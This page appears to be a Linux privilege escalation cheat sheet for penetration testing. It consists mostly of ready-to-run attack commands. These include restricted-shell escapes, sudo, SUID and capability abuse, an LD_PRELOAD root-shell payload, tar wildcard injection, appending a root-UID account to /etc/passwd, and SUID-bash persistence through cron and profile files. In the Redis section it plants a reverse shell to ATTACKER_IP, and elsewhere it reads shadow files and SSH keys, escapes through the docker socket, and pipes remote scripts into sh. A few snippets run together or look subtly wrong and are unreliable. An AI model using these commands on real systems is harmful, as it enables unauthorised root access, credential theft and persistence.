Complete Linux privilege escalation guide for penetration testing and ethical hacking. Learn sudo abuse, SUID/SGID exploitation, kernel exploits, capabilities, cron jobs, systemd timers, and automated enumeration with LinPEAS to gain root access on compromised Linux systems.
Linux privilege escalation involves identifying and exploiting misconfigurations, vulnerabilities, and weak permissions to elevate from a low-privilege user to root. This guide follows a systematic enumeration approach to identify potential vectors.
Best Practice: Always check
sudo -lfirst - it’s the fastest check and often yields immediate results. Kernel exploits should be a last resort due to system stability risks.
Sometimes your initial foothold lands you in a restricted shell (e.g., rbash, restricted ksh, forced-command SSH shells). Break out before deep enumeration so you can run the usual privesc checks reliably.
Common symptoms: you can’t cd, you can’t use / in command names, and/or output redirection fails.
# What shell am I in?
echo $0
echo $SHELL
# Bash restricted mode checks (may vary by distro)
shopt -op restricted 2>/dev/null
set -o | grep -i restricted 2>/dev/null
# Quick “symptom test”
cd / 2>/dev/null || echo "cd blocked"
echo test > /tmp/rstest 2>/dev/null || echo "redirection blocked"
Before you start trying random escapes, quickly enumerate what you can execute and prioritize anything with extra privileges (via sudo, SUID, or capabilities). Those are the best GTFOBins candidates.
List commands the shell can resolve (great for restricted shells)
compgen -c 2>/dev/null | sort -u
# If compgen isn't available, list binaries in PATH
for d in ${PATH//:/ }; do ls -1 "$d" 2>/dev/null; done | sort -u
Check if a specific binary exists (example)
command -v vim
command -v less
command -v tar
Binary Shortlist to Look For:
vim,vi,less,more,man,tar,zip,find,awk,perl,python3,ruby,node,lua,openssl,nmap,busybox
# High-value: what can I run via sudo?
sudo -l 2>/dev/null
# High-value: SUID binaries on the box
find / -perm -4000 -type f 2>/dev/null
# High-value: binaries with dangerous capabilities
getcap -r / 2>/dev/null
If you can execute any other shell/interpreter, aim to spawn a clean interactive shell.
# If another shell exists in PATH
bash --noprofile --norc
sh
dash
zsh
ksh
Clear hostile environment (helps if options/env are enforced)
env -i bash --noprofile --norc
# Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
# Perl / Ruby / PHP
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
php -r 'system("/bin/sh");'
These are frequently available even when “normal” shells are restricted.
# vim / vi (inside the editor)
:set shell=/bin/sh
:shell
# or:
:!/bin/sh
# less / more (while viewing a file)
!/bin/sh
# man (while in the pager)
!/bin/sh
rbash commonly blocks cd, changing PATH, using / in command names, and redirection. Work around this by:
# Enumerate what you can run (lists commands Bash can resolve)
compgen -c 2>/dev/null | sort -u
# Review PATH directories (you can *reference* / in variables even if you can't type / in a command name)
echo "$PATH"
for d in ${PATH//:/ }; do ls -la "$d"; done
PATH, then execute it by name (no / needed).These checks are fast and commonly successful. Run these immediately after gaining initial access.
sudo -l
sudo -l 2>/dev/null
If sudo access found, check GTFOBins for exploitation methods.
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Find both
find / -perm -6000 -type f 2>/dev/null
getcap -r / 2>/dev/null
# CVE-2021-4034 (pkexec)
which pkexec
# If present, check if vulnerable version
# CVE-2021-3156 (sudo)
sudo --version
# Check if version < 1.9.5p2
Gather basic system information to understand the target environment:
# System and kernel version
uname -a
cat /etc/os-release
cat /etc/issue
# Current user and groups
id
whoami
groups
# Environment variables
env
echo $PATH
# Network information
ip a
netstat -antup
ss -tulpn
# Running processes
ps aux
ps aux | grep root
LinPEAS (Linux Privilege Escalation Awesome Script):
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or with colors
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh | tee linpeas.out
LinEnum:
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
LinPeas is considered noisey and will most likely set off EDRs
Sudo allows users to execute commands as other users, typically root. Misconfigurations can allow privilege escalation.
sudo -l
sudo -l 2>/dev/null
cat /etc/sudoers
cat /etc/sudoers.d/*
Sudo without password:
sudo -u root /bin/bash
Sudo with specific binaries (check GTFOBins):
# If allowed to run specific command
sudo /usr/bin/vim
sudo /usr/bin/nano
sudo /usr/bin/less
sudo /usr/bin/more
sudo /usr/bin/find
sudo /usr/bin/nmap
sudo /usr/bin/python3
sudo /usr/bin/awk
sudo /usr/bin/perl
sudo /usr/bin/ruby
Sudo environment variables:
# If env_keep includes PATH
sudo env PATH=$PATH:/tmp /bin/bash
# If env_keep includes LD_PRELOAD
echo 'int __libc_start_main(){system("/bin/sh");}' > /tmp/x.c
gcc -fPIC -shared -o /tmp/x.so /tmp/x.c
sudo LD_PRELOAD=/tmp/x.so <command>
Sudo wildcard abuse:
If sudo allows: sudo /usr/bin/chmod
# Create files that form malicious command
echo '#!/bin/bash' > /tmp/chmod
echo '/bin/bash' >> /tmp/chmod
chmod +x /tmp/chmod
sudo /usr/bin/chmod * # Executes /tmp/chmod
SUID binaries execute with the owner’s privileges, often root. Identify and abuse misconfigured SUID binaries.
Check GTFOBins for exploitation methods:
find - find . -exec /bin/sh \; -quitnmap (interactive mode) - nmap --interactive then !shvim/vi - vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'less/more - less /etc/passwd then !/bin/shnano - nano /etc/passwd then ^R^X to execute commandcp - Copy /etc/passwd and add user with root UIDmv - Move files to overwrite system filesExample with find:
find /etc/passwd -exec /bin/sh \;
Linux capabilities grant specific privileges to binaries without full root access.
# List capabilities
getcap -r / 2>/dev/null
Common dangerous capabilities:
- cap_setuid+ep - Can set UID
- cap_setgid+ep - Can set GID
- cap_dac_override+ep - Bypass file read/write/execute checks
If python has cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
If tar has cap_dac_override:
tar -czf /tmp/exploit.tar.gz /etc/shadow
Scheduled tasks running as root can be exploited if writable or vulnerable to wildcard injection.
# System-wide crontabs
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron.d/*
cat /etc/cron.daily/*
cat /etc/cron.hourly/*
cat /etc/cron.weekly/*
cat /etc/cron.monthly/*
# User crontabs
crontab -l
ls -la /var/spool/cron/crontabs/
cat /var/spool/cron/crontabs/*
# Check for writable cron scripts
find /etc/cron* -type f -writable 2>/dev/null
# If a script is writable and runs as root
echo '#!/bin/bash' > /path/to/script.sh
echo 'chmod +s /bin/bash' >> /path/to/script.sh
chmod +x /path/to/script.sh
# Wait for cron to execute
If cron job uses wildcards: * * * * * root tar -czf /backup/*.log
# Create malicious files that form command
echo '#!/bin/bash' > /path/to/--checkpoint=1
echo 'chmod +s /bin/bash' >> /path/to/--checkpoint=1
chmod +x /path/to/--checkpoint=1
echo '' > /path/to/--checkpoint-action=exec=sh\ script.sh
# When tar runs, it executes the malicious files
# List systemd timers
systemctl list-timers --all
cat /etc/systemd/system/*.timer
cat /etc/systemd/system/*.service
# Check for writable timer/service files
find /etc/systemd -type f -writable 2>/dev/null
find /usr/lib/systemd -type f -writable 2>/dev/null
If a script executes commands without absolute paths and the PATH is writable, inject malicious binaries.
echo $PATH
env | grep PATH
# If PATH includes writable directory
export PATH=/tmp:$PATH
echo '#!/bin/bash' > /tmp/command
echo '/bin/bash' >> /tmp/command
chmod +x /tmp/command
# Execute script that calls 'command'
Writable system files, especially those executed as root, can be exploited.
# Writable files as current user
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys
# Writable directories
find / -writable -type d 2>/dev/null | grep -v proc | grep -v sys
# Files writable by group
find / -perm -g=w -type f 2>/dev/null
# World-writable files
find / -perm -o=w -type f 2>/dev/null | grep -v proc | grep -v sys
Writable /etc/passwd:
# Add user with root UID
echo "hacker:$(openssl passwd -1 -salt xyz password):0:0::/root:/bin/bash" >> /etc/passwd
su hacker
Writable /etc/crontab or cron scripts:
# Add reverse shell or SUID shell
echo "* * * * * root chmod +s /bin/bash" >> /etc/crontab
Writable service files:
# Systemd service files
find /etc/systemd -writable -type f 2>/dev/null
# Modify service to execute commands as root, then:
systemctl daemon-reload
systemctl restart <service>
Writable profile scripts:
# /etc/profile, /etc/profile.d/*, ~/.bashrc, ~/.profile
echo 'chmod +s /bin/bash' >> /etc/profile
# Wait for next login or source the file
# Read shadow file if possible
cat /etc/shadow
cat /etc/passwd
# Check for readable password files
find / -name "*.pem" -o -name "*.key" -o -name "*password*" -o -name "*credential*" 2>/dev/null
# Find SSH keys
find / -name "id_rsa*" -o -name "id_dsa*" -o -name "authorized_keys" 2>/dev/null
cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa
cat ~/.ssh/authorized_keys
# Check command history for passwords
cat ~/.bash_history
cat ~/.zsh_history
cat /root/.bash_history
Services running as root on localhost may be exploitable. NFS shares with no_root_squash can allow privilege escalation.
netstat -antup | grep LISTEN
ss -tulpn | grep LISTEN
lsof -i -P -n | grep LISTEN
MySQL running as root:
mysql -u root -p
# Or if no password
mysql -u root
# Then: SELECT sys_exec('chmod +s /bin/bash');
Redis running as root:
redis-cli
CONFIG SET dir /var/spool/cron
CONFIG SET dbfilename root
SET x "\n* * * * * /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\n"
SAVE
PostgreSQL running as root:
psql -U postgres
# Or if accessible
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('chmod +s /bin/bash');
# Check mounted NFS shares
mount | grep nfs
cat /etc/fstab | grep nfs
showmount -e <target>
# Check for no_root_squash (dangerous)
cat /etc/exports
# If no_root_squash is set, mount share and create SUID binary
Polkit is used for privilege escalation in modern Linux systems. Recent CVEs can allow root access.
pkexec --version
# CVE-2021-4034 affects versions < 0.120
If vulnerable version found, exploit available on GitHub Check: https://github.com/arthepsy/CVE-2021-4034
If inside a container, attempt to escape to the host.
# Check if in container
cat /.dockerenv
ls -la /.dockerenv
cat /proc/1/cgroup
mount | grep docker
# If /var/run/docker.sock is accessible
docker ps
docker exec -it <container> /bin/bash
# Or create new container with host filesystem mounted
docker run -v /:/mnt -it alpine chroot /mnt /bin/bash
Kernel vulnerabilities can provide direct root access but are risky and should be a last resort. Always verify kernel version and search for known exploits.
uname -r
cat /proc/version
# Using searchsploit
searchsploit linux kernel $(uname -r | cut -d. -f1-2)
# Check on exploit-db.com or GitHub
# Verify exploit compatibility before execution
Warning: Kernel exploits can crash the system or cause instability. Always test in a controlled environment first and ensure you have a backup method to regain access.
# 1. Quick checks (fastest, most common)
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
# 2. Initial enumeration
id
uname -a
cat /etc/os-release
# 3. Automated enumeration (if safe to run)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# 4. Manual enumeration based on findings
cat /etc/crontab
systemctl list-timers --all
find / -writable -type f 2>/dev/null | grep -v proc
netstat -antup | grep LISTEN
# 5. Check GTFOBins for specific binaries
# https://www.gtfobins.org
# 6. Kernel exploits (last resort)
uname -r
searchsploit linux kernel $(uname -r | cut -d. -f1-2)
Resource: Always check
GTFOBinsfor specific binary exploitation techniques when you find SUID binaries or sudo permissions.